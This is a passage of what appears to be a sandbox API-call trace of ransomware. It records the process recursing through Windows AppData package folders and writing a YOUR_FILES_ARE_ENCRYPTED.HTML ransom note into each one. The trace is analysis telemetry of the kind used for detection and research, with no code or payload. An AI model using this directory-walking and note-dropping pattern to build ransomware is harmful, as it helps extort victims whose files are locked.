"c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\ac\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0121.566] WriteFile (in: hFile=0x31c, lpBuffer=0x3153030*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3153030*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.566] CloseHandle (hObject=0x31c) returned 1 [0121.567] GetProcessHeap () returned 0x600000 [0121.567] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3153030 | out: hHeap=0x600000) returned 1 [0121.567] GetProcessHeap () returned 0x600000 [0121.567] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.567] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5efcf224, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5efcf224, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5efcf224, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AppData", cAlternateFileName="")) returned 1 [0121.567] StrStrIW (lpFirst="AppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.567] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\AppData") returned 100 [0121.567] GetProcessHeap () returned 0x600000 [0121.568] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.568] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\AppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\AppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\AppData" [0121.568] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\AppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\AppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\AppData\\*" [0121.568] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\AppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5efcf224, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5efcf224, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5efcf224, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14a, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0121.569] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5efcf224, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5efcf224, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5efcf224, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14a, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0121.569] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5efcf224, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5efcf224, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5efcf224, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14a, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 0 [0121.569] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0121.569] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 130 [0121.569] GetProcessHeap () returned 0x600000 [0121.569] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3153030 [0121.569] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\appdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0121.570] WriteFile (in: hFile=0x31c, lpBuffer=0x3153030*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3153030*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.571] CloseHandle (hObject=0x31c) returned 1 [0121.571] GetProcessHeap () returned 0x600000 [0121.571] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3153030 | out: hHeap=0x600000) returned 1 [0121.571] GetProcessHeap () returned 0x600000 [0121.571] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.571] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5efa8e98, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5efa8e98, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5efa8e98, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0121.571] StrStrIW (lpFirst="LocalCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.571] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalCache") returned 103 [0121.571] GetProcessHeap () returned 0x600000 [0121.571] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.571] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalCache" [0121.572] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalCache\\*" [0121.572] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalCache\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5efa8e98, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5efa8e98, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5efa8e98, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14a, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0121.572] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5efa8e98, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5efa8e98, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5efa8e98, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14a, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0121.572] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5efa8e98, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5efa8e98, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5efa8e98, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14a, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 0 [0121.572] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0121.572] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 133 [0121.572] GetProcessHeap () returned 0x600000 [0121.572] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3153030 [0121.572] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0121.573] WriteFile (in: hFile=0x31c, lpBuffer=0x3153030*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3153030*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.574] CloseHandle (hObject=0x31c) returned 1 [0121.574] GetProcessHeap () returned 0x600000 [0121.574] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3153030 | out: hHeap=0x600000) returned 1 [0121.574] GetProcessHeap () returned 0x600000 [0121.574] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.574] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5efa8e98, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5efa8e98, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5efa8e98, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0121.574] StrStrIW (lpFirst="LocalState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.574] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState") returned 103 [0121.574] GetProcessHeap () returned 0x600000 [0121.574] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.574] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState" [0121.575] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\*" [0121.575] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5efa8e98, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x905ddec2, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x905ddec2, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14a, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626638 [0121.575] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5efa8e98, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x905ddec2, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x905ddec2, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14a, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0121.575] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x905ddec2, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x905ddec2, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x905ddec2, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14a, dwReserved1=0x63d090, cFileName="Indexed", cAlternateFileName="")) returned 1 [0121.575] StrStrIW (lpFirst="Indexed", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.575] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed") returned 111 [0121.575] GetProcessHeap () returned 0x600000 [0121.575] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0121.576] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed" [0121.576] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\*" [0121.576] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x905ddec2, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x905ddec2, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x905ddec2, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f6218, dwReserved1=0x63d098, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0121.576] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x905ddec2, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x905ddec2, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x905ddec2, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f6218, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 1 [0121.576] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x905ddec2, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x905ddec2, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x905ddec2, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f6218, dwReserved1=0x63d098, cFileName="Settings", cAlternateFileName="")) returned 1 [0121.576] StrStrIW (lpFirst="Settings", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.576] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings") returned 120 [0121.576] GetProcessHeap () returned 0x600000 [0121.576] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x670340 [0121.578] lstrcpyW (in: lpString1=0x670340, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings" [0121.578] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\*" [0121.578] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\*", lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x905ddec2, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x905ddec2, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x905ddec2, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f8190, dwReserved1=0x6f80b0, cFileName=".", cAlternateFileName="")) returned 0x626878 [0121.578] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x905ddec2, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x905ddec2, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x905ddec2, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f8190, dwReserved1=0x6f80b0, cFileName="..", cAlternateFileName="")) returned 1 [0121.578] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x905ddec2, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x90d3d67e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x90d3d67e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f8190, dwReserved1=0x6f80b0, cFileName="en-US", cAlternateFileName="")) returned 1 [0121.578] StrStrIW (lpFirst="en-US", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.578] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US") returned 126 [0121.578] GetProcessHeap () returned 0x600000 [0121.578] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x680348 [0121.579] lstrcpyW (in: lpString1=0x680348, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US" [0121.579] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\*" [0121.579] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\*", lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x905ddec2, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x90d3d67e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x90d3d67e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0121.579] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x905ddec2, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x90d3d67e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x90d3d67e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="..", cAlternateFileName="")) returned 1 [0121.580] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x959c295b, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x959c295b, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x2216c19d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35d, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="aaa_Classic_{241d7c96-f8bf-4f85-b01f-e2b043341a4b}.settingcontent-ms", cAlternateFileName="AAA_CL~1.SET")) returned 1 [0121.580] StrStrIW (lpFirst="aaa_Classic_{241d7c96-f8bf-4f85-b01f-e2b043341a4b}.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.580] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\aaa_Classic_{241d7c96-f8bf-4f85-b01f-e2b043341a4b}.settingcontent-ms") returned 195 [0121.580] PathFindExtensionW 